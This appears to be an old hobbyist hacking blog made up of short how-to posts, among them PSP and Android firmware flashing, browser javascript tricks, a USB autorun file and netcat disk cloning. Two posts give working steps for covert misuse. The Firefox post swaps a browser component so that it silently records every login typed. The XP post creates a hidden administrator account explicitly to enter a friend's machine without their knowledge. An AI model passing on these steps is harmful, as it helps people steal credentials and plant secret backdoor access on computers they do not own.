Tuesday, 6 August 2013

Making your own Deface page using Javascript

Cy4n0g3n H4ck3r

Sunday, 14 July 2013

Convert your Firefox into keylogger

This tutorial will tell you how to convert your browser into Keylogger without installing any software.

A keylogger is a hardware device or a software program that records the real time activity of a computer user including the keyboard keys they press.

Working in the behind:

For converting a firefox browser into a Keylogger the person has to do a little changes in a script "nsLoginManagerPrompter.js". We have just change firefox's script a little so that every time a person try to login into any website via firefox, it will automatically save the password and username typed.

Note: This script can only be found in lower version of Firefox like Firefox 3.6.10


  1. Download the Script from Here
  2. Go to " C:/Program Files/Mozilla Firefox/Components"
  3. Search for a file "nsLoginManagerPrompter.js" and backup it or copy it somewhere safe.
  4. Now paste the script you've downloaded,and replace it with original "nsLoginManagerPrompter.js" script.
  5. Done ! Now each and every E-mail and password typed will be saved automatically.
For looking at the saved password user can browse to Menu section of Firefox and 
Options > Security tab > Saved passwords.




Sunday, 30 June 2013

Latest PSP(1000/2000/3000/3004) hack 6.60 PRO-C fixed

Hey PSP gamers, we are presenting the latest hack of PSP Official Firware 6.60.
You dont have to be any programmer or hacker .This hack is so easy to apply on all of your PSPs including Phat or whether its slim. Below is the stepwise procedure to hack your PSP 1000/2000/3004

1. Download OFW 6.60 - http://www.mediafire.com/download/t7cbjzr93u3ztaj/6.60_OFW.zip
(If you are already on 6.60 version then there is no need to download)
2. Extract the file
3. Copy EBOOT.PBP to PSP/GAME/UPDATE/
4. If you are not at 6.60 OFW then from the xmb (main psp menu) run the update from Game – Memory Stick
5. The process will guide you to install 6.60 on your PSP
6. Now you are on OFW 6.60
7. Download 6.60 PRO-C - http://www.mediafire.com/download/zas30q01zcau87g/6.60_PRO-C.zip
8. Extract the file
9. Copy PROUPDATE and CIPL Flasher folders to PSP/GAME/
10. From the xmb (main psp menu) run the PROUPDATE from Game - Memory stick.
11. Press X to install CFW
12. From the xmb (main psp menu) run the CIPL Flasher from Game - Memory stick.
Caution: The CIPL Flasher is only for PSP-1000 , after running this the hack will remain inside the flash memory of PSP means if u remove the battery and start again PSP, the hack will remain. 
13. Voila..You have successfully installed 6.60 PRO-C.

NOTE: If you are on PSP-3004 and accidentally your PSP got switched off or runs out of battery then the hack is gone and for that you have to run "FastRecovery" file in ms0:/PSP/GAME/ folder. Just run it once and the hack will return like it was previously.

But in case of PSP-1000, this hack will be persistent. I mean if the PSP runs out of battery or we switch it off, the hack will still remain when we power it ON again.

Guys please do not upgrade your ROM to 6.61, this hack will only run on 6.60. If you have upgraded your ROM, you should downgrade it back to 6.60 and repeat the steps again.

Repairing guide for PSP 300X by ifixit.com if you run into some hardware related issues

http://www.mediafire.com/file/6h52t89tldowi1t/repairing_PSP3004.pdf

Download the ISOs and enjoy.. If you want the latest ISO link email me at : saurabh220189@gmail.com

Wednesday, 8 May 2013

Facebook trick to know user's best friend

1. Login to facebook
2. Press 'ctrl+u' to view the page source of facebook.
3. Press 'ctrl+f' to search for 'ordered_list.top_friends'
4. Copy the first id in the ordered list. It would be looking like 1978268992.
5. Paste the id in front of url, like Www.facebook.com/1468292627 and press enter.
6. Congrats you will be redirected to your best friend's profile whom u have interacted the most.

Wednesday, 2 January 2013

Installing Custom ROMs on ur Android phones


NOTE: The procedure i am showing is for Samsung Galaxy Mini (GT-S5570). Dont try this on any other phone (u can brick it)


1. Download the ClockworkMod Recovery kernel, Odin v4.38, and TASS.ops
These are the links from where u can download

ClockworkMod Recovery file

Odin v4.38 for Galaxy Mini

TASS.ops for Galaxy Mini

2. Open Odin v4.38.

3. Power off the Galaxy Mini and connect the microUSB to the computer.

4. Boot the Galaxy Mini into download mode by holding Volume Down, Home, & Power.

5. Connect the microUSB cable from the computer to the Galaxy Mini.

6. Wait for Odin to recognize the Galaxy Mini (the box in the top left will turn yellow and say (COM #) where # is a random number).

7. Ensure One Package is checked right below that box.

8. Select TASS.ops by pressing the OPS button.

9. Select tass-recovery-cwm.tar by pressing the One Package button.

10. Press Start and wait until the phone reboots.

11. The Galaxy Mini now has the ClockworkMod Recovery installed. Continue to the next section.

NOW we have to install a Custom ROM on our phone. For that you need to download it first (it will be a .zip file)

Place the CyanogenMod rom .zip file on the root of the SD card:
1. Boot the phone into recovery mode.(By pressing Home button while switching it ON)
2. In recovery menu choose "Install zip file from Sdcard".
3. Installation will start when u will browse to the file and select it.
4. Phone gets restarted.
5. Again goto Recovery menu by pressing Home button while switching it ON.
6. Go to Advanced
7. Choose "Wipe dalvik-cache"
8. Now go to "Mounts & Storage"
9. Choose "Wipe /cache"
10. Reboot your phone.

Now ur Android device is ready to boot into ur own custom ROM , keep ur spirits up and start developing ur own ROM and flashing ur phones. The procedure is same for other android phones but just the files are different..


Sunday, 5 August 2012

Create a Hidden User in XP

Hey friends ,this post will help u in getting into ur friend's machine without his knowledge.
1. First of all u have to create a normal account via cmd (Command Prompt) :

         Start >Run >cmd >net user hidden /add

'hidden' is the username of the hidden account that u want to create. U can choose any.

2. If u want to grant that user "Administrative Rights", u can do by as follows :

       Start >Run >cmd >net localgroups Administrators hidden /add

Obviously who wants a less privileged account.

3. Here came the registry editing part. One of my favorite sport, as i love to tweak with windows registry.

      Start >Run >regedit
Goto following Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\
Winlogon\SpecialAccounts\UserList

Create the Value Data Type by right clicking in right pane.

Data Type: REG_DWORD [Dword Value] // Value Name: hidden AND Value Data: [0 = Account is Hidden / 1 = Enabled]
Exit Registry and Reboot

Voila !!!!! On welcome screen u wont be able to see the hidden account.

U can access it by pressing "Ctrl+Alt+Del" twice. In username write 'hidden' and press Enter.

Welcome to UR new Hidden Account :D

Sunday, 22 July 2012

:D Browser trick that will make images dance :) :P


A Javascript trick that makes all the images on the site your on float and dance around. :)

//*****You can do this to ANY site with images******//

Directions:
Open your internet web browser, go to your prefered site you wish to do this trick on, Once there, Go to the address bar on top, Delete everything that's there, and copy and paste the code below into it, press enter and have fun. :]

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+ "px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+" px"}R++}setInterval('A()',5); void(0);




Screen Shaker Trick
Check out these funny trick.
• Copy and paste the java script code to the address bar of your
browser

javascript:function Shw(n) {if (self.moveBy) {for (i = 100; i > 0; i--){for (j = n; j > 0; j--){self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0);} } }} Shw(6)

2: Press enter and watch your window's "shaking it". You can change
the value of i if you wish :-)


NOTE: The above tricks is applicable for Mozilla n IE browsers.
Change the variables according to your wish n see the difference...

Friday, 22 June 2012

How to change LOGO of Pendrive

Hi friend with this hack ,u will be able to change the default icon of ur pendrive to any icon u want.

For this u need to create a "autorun.inf" file in ur pendrive, and copy paste the contents as follows:

[AutoRun]
icon=icons\iconname.ico                                     <---------path to ur icon
label=Saurabh's PD                                            <---------name of ur PD
Shell\Option1\Command=Software\anything.exe <---------path to software to run after autorun

If u dont have .ico file and u want to change ur .jpg file to .ico .Link to this:
http://www.prodraw.net/favicon/generator.php

Enjoy with ur customized Pendrive...

Wednesday, 13 June 2012

Cloning of Drives using Netcat


AIM : To clone server 1 disk to server 2



Server 1:
dd if=/dev/sda | nc 192.168.0.12 1234

Suppose Server 2's IP address in this example is 192.168.0.12 and listening on port 1234.

Note: /dev/sda is the disk to clone. Choose which disk u want to clone.

Server 2: (run this first)

nc -lp 1234 | dd of=/dev/sda

Note: U can view the progress of process by installing pipe viewer to see the progress bar.Then the format will be:

nc -lp 1234 | pv | dd of=/dev/sda


RESULT
: This will clone the disk from server 1 to server 2.

Link to download Netcat